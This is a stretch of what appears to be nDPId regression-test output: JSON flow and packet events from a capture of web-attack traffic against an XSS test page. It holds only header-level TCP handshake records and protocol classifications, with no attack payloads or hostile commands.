-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1499347608596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347608596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UBJAAD4Gdb6sEAABwKgKMuaIAFDT6AnDAAAAAKACchA\/cwAAAgQFtAQCCAoBO1nRAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":2,"flow_last_seen":1499347608596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347608596,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5oh16C+h0+gJxKAScSBrnQAAAgQFtAQCCAoD5StGATtZ0QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":3,"flow_last_seen":1499347608597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347608597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UBNAAD4GdcWsEAABwKgKMuaIAFDT6AnEdegvooAQAOUKpQAAAQEICgE7WdED5StG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347611162,"flow_last_seen":1499347611162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347611162,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1499347611162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347611162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8at5AAD4GWvKsEAABwKgKMuaiAFBCbDaMAAAAAKACchChiwAAAgQFtAQCCAoBO1xSAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":2,"flow_last_seen":1499347611162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347611162,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5qKcQtTMQmw2jaAScSD\/rQAAAgQFtAQCCAoD5S3IATtcUgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":3,"flow_last_seen":1499347611163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347611163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0at9AAD4GWvmsEAABwKgKMuaiAFBCbDaNnELUzYAQAOWetAAAAQEICgE7XFMD5S3I"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347612465,"flow_last_seen":1499347612465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347612465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1499347612465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347612465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dipAAD4GT6asEAABwKgKMuawAFAlJSuyAAAAAKACchDIWAAAAgQFtAQCCAoBO12YAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":2,"flow_last_seen":1499347612466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347612466,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5rAZOYT0JSUrs6AScSD4FwAAAgQFtAQCCAoD5S8NATtdmAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":3,"flow_last_seen":1499347612467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347612467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ditAAD4GT62sEAABwKgKMuawAFAlJSuzGTmE9YAQAOWXHgAAAQEICgE7XZkD5S8N"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347613718,"flow_last_seen":1499347613718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347613718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1499347613718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613718,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VmlAAD4Gb2esEAABwKgKMua+AFCqCgi7AAAAAKACchBlIgAAAgQFtAQCCAoBO17SAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":2,"flow_last_seen":1499347613719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5r4KHPZlqgoIvKAScSAxUwAAAgQFtAQCCAoD5TBHATte0gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":3,"flow_last_seen":1499347613719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347613719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VmpAAD4Gb26sEAABwKgKMua+AFCqCgi8Chz2ZoAQAOXQWgAAAQEICgE7XtID5TBH"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347616210,"flow_last_seen":1499347616210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347616210,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1499347616210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YLdAAD4GZRmsEAABwKgKMubYAFBJnwH3AAAAAKACchDJyQAAAgQFtAQCCAoBO2FAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":2,"flow_last_seen":1499347616211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5thWFuJlSZ8B+KAScSBbkQAAAgQFtAQCCAoD5TK2ATthQAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":3,"flow_last_seen":1499347616212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347616212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YLhAAD4GZSCsEAABwKgKMubYAFBJnwH4VhbiZoAQAOX6lwAAAQEICgE7YUED5TK2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347617491,"flow_last_seen":1499347617491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617491,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1499347617491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347617491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDpAAD4GcZasEAABwKgKMubmAFD8gja7AAAAAKACchDg0gAAAgQFtAQCCAoBO2KBAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":2,"flow_last_seen":1499347617491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347617491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ubMDNHo\/II2vKAScSAL4QAAAgQFtAQCCAoD5TP2ATtigQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":3,"flow_last_seen":1499347617492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347617492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDtAAD4GcZ2sEAABwKgKMubmAFD8gja8zAzR6YAQAOWq6AAAAQEICgE7YoED5TP2"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347618757,"flow_last_seen":1499347618757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347618757,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1499347618757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347618757,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UcRAAD4GdAysEAABwKgKMub0AFCevDJ5AAAAAKACchBBkQAAAgQFtAQCCAoBO2O9AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":2,"flow_last_seen":1499347618757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347618757,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5vRXo2m0nrwyeqAScSBIAQAAAgQFtAQCCAoD5TUyATtjvQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":3,"flow_last_seen":1499347618758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347618758,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UcVAAD4GdBOsEAABwKgKMub0AFCevDJ6V6NptYAQAOXnBwAAAQEICgE7Y74D5TUy"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347621256,"flow_last_seen":1499347621256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347621256,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1499347621256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347621256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Hc9AAD4GqAGsEAABwKgKMucOAFD+NnvhAAAAAKACchCWIwAAAgQFtAQCCAoBO2YuAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":2,"flow_last_seen":1499347621256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347621256,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5w6DP0I9\/jZ74qAScSCV\/QAAAgQFtAQCCAoD5TejATtmLgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":3,"flow_last_seen":1499347621257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347621257,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HdBAAD4GqAisEAABwKgKMucOAFD+Nnvigz9CPoAQAOU1BQAAAQEICgE7Zi4D5Tej"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347622524,"flow_last_seen":1499347622524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347622524,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1499347622524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347622524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QPZAAD4GhNqsEAABwKgKMuccAFAFlCedAAAAAKACchDhvwAAAgQFtAQCCAoBO2drAAAAAAEDAwc="} 